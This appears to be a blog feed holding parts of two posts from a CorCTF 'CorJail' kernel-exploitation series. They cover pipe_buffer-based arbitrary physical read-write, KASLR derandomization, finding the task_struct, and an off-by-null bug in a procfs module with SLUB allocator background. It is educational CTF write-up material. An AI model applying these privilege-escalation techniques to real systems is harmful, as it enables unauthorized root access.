<p>However, the above picture is grossly oversimplified, and understanding the exploitation technique requires digging a bit deeper into the implementation. In particular, the circular buffer is realized through multiple non-contiguous pages of memory, each of which is managed by a <code class="language-plaintext highlighter-rouge">pipe_buffer</code> structure. The <code class="language-plaintext highlighter-rouge">pipe_buffer</code> contains a pointer to the <code class="language-plaintext highlighter-rouge">page</code> describing the underlying memory, as well as the offset and length of the user data currently stored on the page. As we can see in the next figure, this indirection allows minimizing the pipe’s memory footprint.</p>

<p><img src="/media/Linux-S2/pipe_semi_simple.jpg" alt="" /></p>

<p>Finally, we need to make one last adjustment to our mental picture, namely that the kernel stores the <code class="language-plaintext highlighter-rouge">pipe_buffer</code>s in a heap-allocated array, a pointer to which is kept in the <code class="language-plaintext highlighter-rouge">bufs</code> member of <code class="language-plaintext highlighter-rouge">pipe_inode_info</code>. The integers <code class="language-plaintext highlighter-rouge">head</code> and <code class="language-plaintext highlighter-rouge">tail</code> are indices into this array, and circularity is implemented by masking them before each access with the array length minus one; the length, a.k.a. <code class="language-plaintext highlighter-rouge">ring_size</code>, is always a power of two. It is exactly an array of this kind that we arbitrarily freed earlier.</p>

<p><img src="/media/Linux-S2/pipe_sufficient.jpg" alt="" /></p>

<p>Given that background, there is not much creativity involved in devising a way to abuse the UAF to create an arbitrary read-write primitive. By setting the <code class="language-plaintext highlighter-rouge">page</code>, <code class="language-plaintext highlighter-rouge">offset</code>, and <code class="language-plaintext highlighter-rouge">len</code> fields of the <code class="language-plaintext highlighter-rouge">tail</code> buffer before performing an i/o operation on the pipe, we can read from or write to arbitrary RAM-backed physical addresses.</p>

<p><img src="/media/Linux-S2/pipe_rw_idea.jpg" alt="" /></p>

<p>The conversion between physical, virtual, and <code class="language-plaintext highlighter-rouge">page</code> addresses required for this technique involves two distinct regions in the kernel’s virtual memory space: the direct map and the vmemmap region. The former is, as the name suggests, a direct map of all physical memory of the system, while the latter is an array of <code class="language-plaintext highlighter-rouge">page</code> structures describing this memory, c.f., the figure below for a simplified illustration.</p>

<p><img src="/media/Linux-S2/mm_overview.jpg" alt="" /></p>

<p>Until now, it was sufficient to corrupt the arbitrarily freed object once, e.g., to replace it with a fake object for stack pivoting. However, we plan to scan substantial amounts of physical memory, and thus we need to be able to edit the <code class="language-plaintext highlighter-rouge">pipe_buffer</code> array repeatedly. Performing thousands of free and reclaim races sounds like an excellent recipe for crashing the kernel. Thus, another approach is needed. Ideally, we want a user data container without any headers whose contents we can update without reallocating it. Luckily, tty write buffers give us just that primitive [<a href="https://github.com/0xkol/badspin">17</a>].</p>

<p><em>Aside: There is another way to solve this problem by using a second pipe. The first pipe is corrupted once such that the <code class="language-plaintext highlighter-rouge">pipe_buffer</code> at <code class="language-plaintext highlighter-rouge">tail</code> references the page containing the <code class="language-plaintext highlighter-rouge">pipe_buffer</code> array. Then, we splice the whole buffer into a second pipe. Now, the catch is that pipes keep one scratch page for performance reasons, and through careful manipulation of the second pipe we can make sure that its scratch page is always the one containing the first pipe’s buffer array [<a href="https://www.interruptlabs.co.uk/articles/pipe-buffer">18</a>].</em></p>

<p><em>Aside: Besides the <code class="language-plaintext highlighter-rouge">page</code>, <code class="language-plaintext highlighter-rouge">offset</code>, and <code class="language-plaintext highlighter-rouge">len</code> members, there is one more thing we need to initialize in the <code class="language-plaintext highlighter-rouge">pipe_buffer</code> if we want to use it for writing: the <code class="language-plaintext highlighter-rouge">flags</code>. In particular, we need to set the <code class="language-plaintext highlighter-rouge">PIPE_BUF_FLAG_CAN_MERGE</code> flag to indicate that it is okay to “append” subsequent writes to this buffer. Yes, that is the flag that caused all the Dirty Pipe trouble and I still forgot to initialize it.</em></p>

<p><em>Aside: After our sprays we will own plenty of pipes and ttys, however, we do not know which pipe is corrupted and which tty is responsible for it. We can use the <code class="language-plaintext highlighter-rouge">FIONREAD</code> ioctl on the pipe, which returns the number of bytes that can be read from it, together with unique write buffer payloads to figure out the pairing [<a href="https://github.com/vobst/ctf-corjail-public/blob/master/libexp/rw_pipe_and_tty.c#L77">19</a>].</em></p>

<h3 id="kernel-address-space-layout-randomization-kaslr-revisited">Kernel Address Space Layout Randomization (KASLR) Revisited</h3>

<p>Before we can proceed, we need to take a step back and take a closer look at the leaks we collected in the previous blog post.</p>

<p>Recall that we leaked a pointer to a <code class="language-plaintext highlighter-rouge">page</code> as well as a pointer to a heap-allocated <code class="language-plaintext highlighter-rouge">tty_struct</code>. The former points into the kernel’s vmemmap region, while the latter points into a RAM-backed section of the kernel’s direct map, also known as the page-offset region, which maps all of physical memory [<a href="https://www.kernel.org/doc/html/v5.10/x86/x86_64/mm.html">20</a>].</p>

<p>Both regions are randomized independently at kernel startup with a granularity of one GiB, which is the size of memory covered by a Page Upper Directory (PUD) entry [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/mm/kaslr.c#L64">21</a>]. Due to constraints on the layout of virtual memory, the entropy of the randomization is about 15 bits according to a comment by the developers. Furthermore, the region’s ordering must remain unchanged. Note that the randomized regions may start above <em>or below</em> their nonrandomized base addresses, which are <code class="language-plaintext highlighter-rouge">0xffffea0000000000</code> and <code class="language-plaintext highlighter-rouge">0xffff888000000000</code>, respectively [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/mm/kaslr.c#L64">21</a>].</p>

<p>Without further assumptions, it is only possible to extract the base address of a memory region from a valid pointer if we know that the pointer’s offset from the region base cannot be larger than the randomization granularity. This immediately implies that, in the general case, it is not possible to extract the <code class="language-plaintext highlighter-rouge">page_offset_base</code> from a valid pointer into the direct map, at least not on systems with more than one GiB of RAM.</p>

<p>However, for the leaked <code class="language-plaintext highlighter-rouge">page</code> pointer the situation is less certain. As the size of <code class="language-plaintext highlighter-rouge">struct page</code> is 64 bytes, a vmemmap region of size one GiB can describe 64 GiB of physical memory. On my laptop with 32 GiB of RAM, for example, the size of the physical memory space is 34 GiB, which would make every valid page pointer splittable into the Page Frame Number (PFN) and the <code class="language-plaintext highlighter-rouge">vmemmap_base</code>.</p>

<p>Assuming that we can split the leaked <code class="language-plaintext highlighter-rouge">page</code> pointer, the pipe-based physical read primitive can be used to search for the kernel image. According to the documentation of the <code class="language-plaintext highlighter-rouge">RANDOMIZE_BASE</code> configuration option, the virtual and physical base addresses of the kernel image are randomized separately [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/boot/compressed/misc.c#L413">22</a>]. Consequently, our virtual kernel image leak is useless for this task. Furthermore, we know that the kernel can be anywhere between 16 MiB and the top of physical memory, which we take to be 64 GiB, with a worst-case granularity of 2 MiB [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/Kconfig#L2122">23</a>] [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/Kconfig#L2162">24</a>].</p>

<p>This results in roughly 30k possible base addresses. The number of read operations can be reduced further by using the fact that the kernel text section alone is usually already larger than 10 MiB. Thus, by reading only every fifth possible physical base, we can derandomize the kernel in about 6k reads, at worst. Afterwards, reading the <code class="language-plaintext highlighter-rouge">page_offset_base</code> variable from the data section finally allows us to convert back and forth between virtual and physical addresses.</p>

<p><em>Aside: If we cannot split the leaked page pointer, we might as well flip a coin, i.e., start searching for the kernel base either towards lower or higher physical addresses. As this might lead to invalid accesses beyond the vmemmap region, we introduce a 50% probability of failure at this point.</em></p>

<p><em>Aside: While developing the original version of my exploit, I did not pay sufficient attention to this topic. I simply assumed that the leaked physmap pointer is always splittable, which was only true because ASLR was disabled. However, as we saw above, the pipe-based exploit flow can still work by first finding the kernel image. Nevertheless, it would still be nice to have ASLR enabled during development to avoid making such mistakes in the future. For debugging, randomization of the kernel image, both physical and virtual, is a pain. Unfortunately, as far as I know, there is no way to selectively enable the randomization of only the vmemmap, vmalloc, and page-offset regions. We can work around that restriction by disabling ASLR on the kernel command line, which will make the boot stub decompress the kernel at the physical address <code class="language-plaintext highlighter-rouge">0x1000000</code> and map it to the virtual address <code class="language-plaintext highlighter-rouge">0xffffffff81000000</code> [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/Kconfig#L2064">25</a>] [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/boot/compressed/misc.c#L341">26</a>]. After jumping into the decompressed kernel, we can use the debugger to edit the boot parameters to pretend that ASLR is enabled, which will result in the randomization of the other memory regions [<a href="https://github.com/vobst/like-dbg-fork-public/blob/d2d50a5bce3986fe30cd43bf8595825dd7266324/io/scripts/gdb_script_partial_kaslr.py">27</a>]. In the future, it would be nice to automate debugging with full ASLR enabled.</em></p>

<h3 id="finding-our-task-struct">Finding our Task Struct</h3>

<p>With that technicality out of the way, we can start to explore physical memory. An obvious target for a data-only privilege escalation is the <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/sched.h#L648"><code class="language-plaintext highlighter-rouge">task_struct</code></a> of the exploit process, which is the structure that the kernel uses to track all kinds of information needed to run the task. In order to find it, we can leverage the fact that it includes the process’ <code class="language-plaintext highlighter-rouge">comm</code>, a 16-byte name that we can set using a <code class="language-plaintext highlighter-rouge">prctl</code> command. Setting the <code class="language-plaintext highlighter-rouge">comm</code> prior to searching reduces the risk of finding a stale task struct of a dead thread. It is also recommended to perform sanity checks on each instance of the name found during the memory scan to ensure that it indeed belongs to our task descriptor, and not, for example, to the page cache entry of our executable or to our process’ address space.</p>

<h2 id="wrap-up">Wrap Up</h2>

<p><img src="/media/Linux-S2/roadmap_2.jpg" alt="" /></p>

<p>Constructing an arbitrary free primitive from our UAF in kmalloc-32 allowed us to cause a UAF on a <code class="language-plaintext highlighter-rouge">pipe_buffer</code> array. Afterwards, we explored two ways to capitalize on this. First, we reclaimed the freed slot with a <code class="language-plaintext highlighter-rouge">user_key_payload</code> that contained a fake <code class="language-plaintext highlighter-rouge">pipe_buffer</code> whose destructor was manipulated to trigger a stack pivot into a ROP chain stored in the same buffer. Second, we reclaimed the slot with a tty write buffer, which gave us the freedom to repeatedly overwrite the <code class="language-plaintext highlighter-rouge">pipe_buffer</code>. With a little bit of background on how pipes work, this primitive enabled us to scan physical memory to locate our task descriptor.</p>

<p>In the next post, we will recall why we are doing this whole exercise. On a conceptual level, the goal is to elevate the privileges of our process; however, as we will discover, many mechanisms act together to define what is commonly referred to as a process’ privileges. Our task will be to identify the parameters we need to tweak to perform the privileged action we need to win the challenge, i.e., reading a file in the root user’s home directory. Furthermore, we will learn how to easily experiment with different privilege escalation approaches to develop stable exploit routines, using both the code execution and the read-write primitive.</p>

<h2 id="references">References</h2>

<p>[0] https://blog.eb9f.de/2023/07/20/Linux-S1-E1.html</p>

<p>[1] https://github.com/vobst/ctf-corjail-public</p>

<p>[2] https://github.com/vobst/like-dbg-fork-public</p>

<p>[4] https://elixir.bootlin.com/linux/v5.10.127/source/fs/pipe.c#L806</p>

<p>[5] https://github.com/vobst/ctf-corjail-public/blob/master/sploit.c#L478</p>

<p>[6] https://elixir.bootlin.com/linux/v5.10.127/source/security/keys/user_defined.c#L128</p>

<p>[7] https://pdos.csail.mit.edu/6.S081/2022/readings/rcu-decade-later.pdf</p>

<p>[8] https://elixir.bootlin.com/linux/v5.10.127/source/kernel/sched/membarrier.c#L470</p>

<p>[9] https://github.com/lrh2000/StackRot</p>

<p>[10] https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html</p>

<p>[11] https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html</p>

<p>[12] https://www.youtube.com/watch?v=JRyrhsx-L5Y</p>

<p>[13] https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html</p>

<p>[14] https://support.google.com/faqs/answer/7625886</p>

<p>[15] https://dirtypipe.cm4all.com/</p>

<p>[16] https://lolcads.github.io/posts/2022/06/dirty_pipe_cve_2022_0847/</p>

<p>[17] https://github.com/0xkol/badspin</p>

<p>[18] https://www.interruptlabs.co.uk/articles/pipe-buffer</p>

<p>[19] https://github.com/vobst/ctf-corjail-public/blob/master/libexp/rw_pipe_and_tty.c#L77</p>

<p>[20] https://www.kernel.org/doc/html/v5.10/x86/x86_64/mm.html</p>

<p>[21] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/mm/kaslr.c#L64</p>

<p>[22] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/boot/compressed/misc.c#L413</p>

<p>[23] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/Kconfig#L2122</p>

<p>[24] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/Kconfig#L2162</p>

<p>[25] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/Kconfig#L2064</p>

<p>[26] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/boot/compressed/misc.c#L341</p>

<p>[27] https://github.com/vobst/like-dbg-fork-public/blob/d2d50a5bce3986fe30cd43bf8595825dd7266324/io/scripts/gdb_script_partial_kaslr.py</p>]]></content><author><name></name></author><summary type="html"><![CDATA[_Note: This is the second post in a series on Linux heap exploitation. It assumes that you have read the first part [0]. You can play with the exploit [1] yourself using the kernel debugging setup [2] published alongside this series.]]></summary></entry><entry><title type="html">Linux S1E1: From Off-by-Null to Kernel Pointer Leaks</title><link href="https://blog.eb9f.de/2023/07/20/Linux-S1-E1.html" rel="alternate" type="text/html" title="Linux S1E1: From Off-by-Null to Kernel Pointer Leaks" /><published>2023-07-20T00:00:00+00:00</published><updated>2023-07-20T00:00:00+00:00</updated><id>https://blog.eb9f.de/2023/07/20/Linux-S1-E1</id><content type="html" xml:base="https://blog.eb9f.de/2023/07/20/Linux-S1-E1.html"><![CDATA[<p>About a year ago, I remember watching a video series by LiveOverflow, a security researcher with a well-known Youtube channel, on him “getting into” browser exploitation [<a href="https://www.youtube.com/playlist?list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t">0</a>]. Don’t ask me about any technical details, but what stuck with me is the way he describes how this video series came about; He reflects that he had been interested in the topic for quite a while, regularly annoying experienced researcher with the typical beginner question: “How do I get into it?”, but always just shying away from actually committing to leaning about it - thinking that the topic was too complex, the entry barrier to high.</p>

<p>No clue if that is really what he said in the video, but it is what stuck with me, probably because it was echoing some thoughts of my own: what was browser exploitation for him was kernel exploitation for me. So, this three-part series is the answer I finally gave to my question “How do I get into kernel exploitation?”: just start somewhere, do not wait for the perfect time, just start - the rest you will pick up along the way.</p>

<p>These posts document how I got started with kernel exploitation. They are written by a beginner for beginners. On the upside, this might mean that they are a more accessible resource than the often rather brief writeups by experienced researchers, which gloss over many of the pitfalls that we get caught in. On the downside, however, it means you should take everything I say with a grain of salt. If you spot mistakes, do not hesitate to let me know.</p>

<h2 id="where-to-start">Where to Start?</h2>

<p>LiveOverflow started by analyzing an exploit by a fellow security researcher for a vulnerability that researcher had discovered in the SpiderMonkey JavaScript engine. I had no clue where to start, and more or less by chance ended up with a CTF challenge that I had read about recently.</p>

<p>Last year’s CorCTF [<a href="https://2022.cor.team/">2</a>] featured the CorJail [<a href="https://github.com/Crusaders-of-Rust/corCTF-2022-public-challenge-archive/tree/master/pwn/corjail">3</a>] challenge, which, if I recall correctly, was only solved by a member of the organizing team. I started by carefully reading the writeup [<a href="https://syst3mfailure.io/corjail/">4</a>] by the challenge author and then got to work.</p>

<h2 id="the-single-most-important-thing">The Single Most Important Thing</h2>

<p>Of course, we will conclude this series with a section on learnings and reflections, however, let me spoiler the most important one up front: get yourself a proper debugging setup.</p>

<p>Luckily for us, the challenge repository contains the kernel configuration and patches used for building the image, and thus I started by recompiling the kernel with all the debugging features I wanted. Then I proceeded with building the root filesystem, modifying it to give myself regular root access before launching the unprivileged shell from which we eventually want to elevate our privileges back again.</p>

<p>Next, let us turn to the vulnerable kernel module. Since its source code was available, recompiling it with debug information would have been an option; however, it loaded without problems, and we will not spend much time in there anyway.</p>

<p>Finally, we need a way to debug the kernel. I used my fork of the fabulous like-dbg [<a href="https://github.com/0xricksanchez/like-dbg">5</a>] setup, which is a great platform for building your personal kernel debugging and exploit development environment. Importantly, we also need a way to run custom gdb scripts, which can be easily achieved using this setup.</p>

<p>With scripts, symbols and source code debugging in place, let us go ahead and dissect the vulnerable kernel module.</p>

<p><em>Aside: You can find a release of the setup on GitHub [<a href="https://github.com/vobst/like-dbg-fork-public">6</a>]. You might want to use it together with the exploit [<a href="https://github.com/vobst/ctf-corjail-public">7</a>] to follow along with the series.</em></p>

<h2 id="exploring-the-challenge">Exploring the Challenge</h2>

<p>Like many other kernel CTF challenges, the rootfs contains a custom kernel module that is loaded on boot. However, I like that it is not just some toy driver whose only purpose is to be exploited: the author actually took a kernel patch that was proposed on the mailing list and split it up into a change to the core kernel and a stand-alone module.</p>

<p>In particular, the kernel patch implements per-cpu syscall counters, and the kernel module exposes them to user space via a file in procfs. We can display the counters by reading from the file and filter the shown system calls by writing to it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@CoROS:~1 cat /proc/cormon

      CPU0      CPU1      CPU2      CPU3        Syscall (NR)

        15        12        26         8        sys_poll (7)
         0         0         0         0        sys_fork (57)
        47        51        71        66        sys_execve (59)
         0         0         0         0        sys_msgget (68)
         0         0         0         0        sys_msgsnd (69)
         0         0         0         0        sys_msgrcv (70)
         0         0         0         0        sys_ptrace (101)
        14         4        19         9        sys_setxattr (188)
        11        23        17        25        sys_keyctl (250)
         0         0         2         0        sys_unshare (272)
         0         0         0         0        sys_execveat (322)

root@CoROS:~2 echo -n 'sys_pipe' &gt; /proc/cormon
[   57.315786] [CoRMon::Debug] Syscalls @ 0xffff888104681000
root@CoROS:~3 cat /proc/cormon

      CPU0      CPU1      CPU2      CPU3        Syscall (NR)

         3        13         3         2        sys_pipe (22)
</code></pre></div></div>

<p>There are only a few standardized places where auto-loaded drivers can be specified, and we find the <code class="language-plaintext highlighter-rouge">cormon</code> driver in <code class="language-plaintext highlighter-rouge">/etc/modules</code>. Loading it into BinaryNinja, we can confirm that on load this module creates a file in the proc pseudo file system {1}.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mo">000004</span><span class="mi">9</span><span class="n">f</span>  <span class="kt">uint64_t</span> <span class="nf">init_module</span><span class="p">()</span>

<span class="mo">000004</span><span class="n">a7</span>      <span class="n">printk</span><span class="p">(</span><span class="mh">0x668</span><span class="p">)</span>
<span class="mo">000004</span><span class="n">cc</span>      <span class="kt">int32_t</span> <span class="n">rbx</span>
<span class="mo">000004</span><span class="n">cc</span>      <span class="k">if</span> <span class="p">(</span><span class="n">proc_create</span><span class="p">(</span><span class="mh">0x5a3</span><span class="p">,</span> <span class="mh">0x1b6</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x750</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>  <span class="p">{</span><span class="s">"cormon"</span><span class="p">}</span> <span class="c1">// {1}</span>
<span class="mo">000004</span><span class="n">d5</span>          <span class="n">printk</span><span class="p">(</span><span class="mh">0x698</span><span class="p">)</span> <span class="c1">// [CoRMon::Error] proc_create() call failed!</span>
<span class="mo">000004</span><span class="n">da</span>          <span class="n">rbx</span> <span class="o">=</span> <span class="o">-</span><span class="mh">0xc</span>
<span class="mo">000004</span><span class="n">ea</span>      <span class="k">else</span>
<span class="mo">000004</span><span class="n">ea</span>          <span class="kt">int32_t</span> <span class="n">rax_2</span> <span class="o">=</span> <span class="n">update_filter</span><span class="p">(</span><span class="n">buffer</span><span class="o">:</span> <span class="s">"sys_execve,sys_execveat,sys_fork…"</span><span class="p">)</span>
<span class="mo">000004</span><span class="n">ef</span>          <span class="n">rbx</span> <span class="o">=</span> <span class="n">rax_2</span>
<span class="mo">000004</span><span class="n">f3</span>          <span class="k">if</span> <span class="p">(</span><span class="n">rax_2</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
<span class="mo">00000503</span>              <span class="n">rbx</span> <span class="o">=</span> <span class="o">-</span><span class="mh">0x16</span>
<span class="mo">000004</span><span class="n">fc</span>          <span class="k">else</span>
<span class="mo">000004</span><span class="n">fc</span>              <span class="n">printk</span><span class="p">(</span><span class="mh">0x6c8</span><span class="p">)</span> <span class="c1">// [CoRMon::Init] Initialization complete!</span>
<span class="mf">000004e2</span>      <span class="k">return</span> <span class="n">zx</span><span class="p">.</span><span class="n">q</span><span class="p">(</span><span class="n">rbx</span><span class="p">)</span>
</code></pre></div></div>
<p>The fourth argument of the call to <a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/proc/generic.c#L587"><code class="language-plaintext highlighter-rouge">proc_create</code></a> specifies which functions the kernel will invoke when user space interacts with the file.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mo">00000750</span>  <span class="n">cormon_proc_ops</span><span class="o">:</span>
<span class="mo">00000750</span>  <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span>                          <span class="p">........</span>

<span class="mo">0000075</span><span class="mi">8</span>  <span class="kt">void</span><span class="o">*</span> <span class="n">data_758</span> <span class="o">=</span> <span class="n">cormon_proc_open</span>
<span class="mo">00000760</span>  <span class="kt">void</span><span class="o">*</span> <span class="n">data_760</span> <span class="o">=</span> <span class="n">seq_read</span>

<span class="mo">0000076</span><span class="mi">8</span>                          <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span>          <span class="p">........</span>

<span class="mo">00000770</span>  <span class="kt">void</span><span class="o">*</span> <span class="n">data_770</span> <span class="o">=</span> <span class="n">cormon_proc_write</span>
</code></pre></div></div>
<p>The bug is in the write handler <code class="language-plaintext highlighter-rouge">cormon_proc_write</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mo">000003</span><span class="mi">84</span>  <span class="kt">int64_t</span> <span class="n">cormon_proc_write</span><span class="p">(</span><span class="kt">int64_t</span> <span class="n">filp</span><span class="p">,</span> <span class="kt">int64_t</span> <span class="n">buf</span><span class="p">,</span> <span class="kt">int64_t</span> <span class="n">len</span><span class="p">,</span> <span class="kt">int64_t</span><span class="o">*</span> <span class="n">ppos</span><span class="p">)</span>
<span class="p">...</span>
<span class="mo">000003</span><span class="n">b6</span>      <span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="n">u</span><span class="o">&gt;</span> <span class="mh">0x1000</span><span class="p">)</span> <span class="c1">// {2}</span>
<span class="mo">0000044</span><span class="mi">9</span>          <span class="n">bytes_to_copy</span> <span class="o">=</span> <span class="mh">0xfff</span> <span class="c1">// {3.1}</span>
<span class="mo">000003</span><span class="n">bc</span>      <span class="k">else</span>
<span class="mo">000003</span><span class="n">bc</span>          <span class="n">bytes_to_copy</span> <span class="o">=</span> <span class="n">len</span> <span class="c1">// {3.2}</span>
<span class="mo">000003</span><span class="n">d6</span>      <span class="kt">char</span><span class="o">*</span> <span class="n">buffer</span> <span class="o">=</span> <span class="n">kmem_cache_alloc_trace</span><span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">kmalloc_caches</span> <span class="o">+</span> <span class="mh">0x60</span><span class="p">),</span> <span class="mh">0xa20</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">)</span> <span class="c1">// {4}</span>
<span class="p">...</span>
<span class="mo">0000040</span><span class="n">f</span>              <span class="n">__check_object_size</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">bytes_to_copy</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="mo">0000041</span><span class="n">d</span>              <span class="n">bytes_not_copied</span> <span class="o">=</span> <span class="n">_copy_from_user</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">bytes_to_copy</span><span class="p">)</span> <span class="c1">// {5}</span>
<span class="mo">00000425</span>          <span class="k">if</span> <span class="p">(</span><span class="n">bytes_not_copied</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
<span class="mo">0000047</span><span class="mi">8</span>              <span class="n">printk</span><span class="p">(</span><span class="mh">0x630</span><span class="p">)</span>
<span class="mo">0000047</span><span class="n">d</span>              <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="mh">0xe</span>
<span class="mo">00000427</span>          <span class="k">else</span>
<span class="mo">00000427</span>              <span class="n">buffer</span><span class="p">[</span><span class="n">bytes_to_copy</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span> <span class="c1">// {6}</span>
<span class="mo">00000435</span>              <span class="k">if</span> <span class="p">(</span><span class="n">update_filter</span><span class="p">(</span><span class="n">buffer</span><span class="o">:</span> <span class="n">buffer</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
<span class="mo">000004</span><span class="mi">89</span>                  <span class="n">kfree</span><span class="p">(</span><span class="n">buffer</span><span class="p">)</span>
<span class="mo">000004</span><span class="mi">8</span><span class="n">e</span>                  <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="mh">0x16</span>
<span class="mo">0000043</span><span class="n">a</span>              <span class="k">else</span>
<span class="mo">0000043</span><span class="n">a</span>                  <span class="n">kfree</span><span class="p">(</span><span class="n">buffer</span><span class="p">)</span>
<span class="mo">0000043</span><span class="n">f</span>                  <span class="n">err</span> <span class="o">=</span> <span class="n">len</span>
<span class="mo">0000044</span><span class="mi">8</span>      <span class="k">return</span> <span class="n">err</span>
</code></pre></div></div>
<p>Here, <code class="language-plaintext highlighter-rouge">len</code> and <code class="language-plaintext highlighter-rouge">buf</code> are the arguments user space passed to the write system call. At {2} the function validates the length argument; however, there is an obvious inconsistency between the assignments {3.1} and {3.2} when the length is exactly 0x1000. A buffer of fixed size 0x1000 is allocated at {4} and filled with user data at {5}. No buffer overflow occurs at this point, as <code class="language-plaintext highlighter-rouge">bytes_to_copy</code> is guaranteed to be &lt;= 0x1000. However, since the truncated user data might not be null-terminated, the code appends a terminating null byte at {6}, and for <code class="language-plaintext highlighter-rouge">bytes_to_copy == 0x1000</code> this write lands one byte past the end of the buffer.</p>

<p>Summarizing our findings, the primitive granted by the bug is a linear heap overflow of size one where the written data is always a zero byte. Given the fact that our vulnerability involves the heap, it is probably worth the while to learn a bit about the kernel’s memory allocation algorithm.</p>

<h2 id="slub-cash-course">SLUB Crash Course</h2>

<p>For most people interested in exploitation, the first memory allocator they studied was probably the malloc implementation of glibc. It is a fundamental component of virtually all Linux user space applications; consequently, much research has gone into exploiting it, and there is ample literature on the subject.</p>

<p>However, there are many other ways to implement an allocator for small chunks of memory. For example, Android recently switched to using the Scudo allocator, which was developed with a special focus on security [<a href="https://android-developers.googleblog.com/2020/06/system-hardening-in-android-11.html">8</a>] [<a href="https://www.llvm.org/docs/ScudoHardenedAllocator.html">9</a>].</p>

<p>When you leave user space and enter kernel land, things change. First of all, as of this writing, you can still choose between three different allocators at compile time: SLAB, SLUB and SLOB. Luckily, during the 6.4 merge window (that is, the two-week period in a kernel development cycle where disruptive changes can be merged into the kernel), the death of SLOB was decided. Furthermore, the removal of the SLAB allocator is on the to-do list of memory management developers [<a href="https://lwn.net/Articles/932201/">10</a>]. Our challenge’s kernel is using the SLUB allocator, which will hopefully become the only remaining allocator at some point in the future.</p>

<p>Nevertheless, as is the case with most aspects of the kernel, the allocator can be extensively configured at compile time. Some aspects may also be configured at boot or run time. Our discussion will be tailored to the configuration of the challenge’s kernel, and I will mention the relevant compile-time definitions along the way.</p>

<p>The first difference between glibc’s malloc and SLUB is that SLUB is a so-called <em>slab-allocator</em>. (Note to avoid confusion: The word slab-allocator refers to a particular design for building memory allocators, which is popular in operating system kernels [<a href="https://en.wikipedia.org/wiki/Slab_allocation">11</a>]. A slab, on the other hand, is a particular component in this design that is not to be confused with SLAB, which is a Linux kernel implementation of a slab-allocator.)</p>

<p>The <em>buffers</em> handed out by such an allocator are taken from contiguous memory ranges (typically between one and sixteen pages in size), which are logically subdivided into fixed size <em>slots</em>. Those memory ranges are called <em>slabs</em>.</p>

<p>Each slab is part of exactly one so-called <em>cache</em>. A cache is nothing but a collection of slabs that all have the same slot size. Allocation requests are always (implicitly or explicitly) made against a specific cache, which might in turn create itself a fresh slab to serve the request.</p>

<p>Here’s my attempt at illustrating the above concepts in a drawing.
<img src="/media/Linux-S1/slab_allocation.jpg" alt="" /></p>

<p>For example, in the Linux kernel there is the <em>kmalloc</em> family of caches. Those caches typically cover slot sizes from 32 to 8192 bytes and for each size there are multiple caches with different characteristics. When you read kernel code and see a call like</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="n">buf</span> <span class="o">=</span> <span class="n">kmalloc</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
<span class="p">...</span>
</code></pre></div></div>
<p>the allocation request will be directed towards a cache of the kmalloc family. However, be aware that when reverse engineering you will not see any calls to <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/slab.h#L538"><code class="language-plaintext highlighter-rouge">kmalloc</code></a> in the disassembly because of compiler inlining. In the <code class="language-plaintext highlighter-rouge">cormon_proc_write</code> function, for example, the source code contains a call to <code class="language-plaintext highlighter-rouge">kmalloc</code> while the above listing shows a call to <a href="https://elixir.bootlin.com/linux/v5.10.127/source/mm/slub.c#L2919"><code class="language-plaintext highlighter-rouge">kmem_cache_alloc_trace</code></a>.</p>

<p>Importantly for us, even same size allocation requests might be served from different caches when the second argument differs. Caches in the kmalloc family are also known as “general purpose” caches, as their buffers are used for many different kinds of objects by the kernel.</p>

<p>The other thing that you will frequently see are allocation requests that are explicitly directed towards a specific cache.</p>
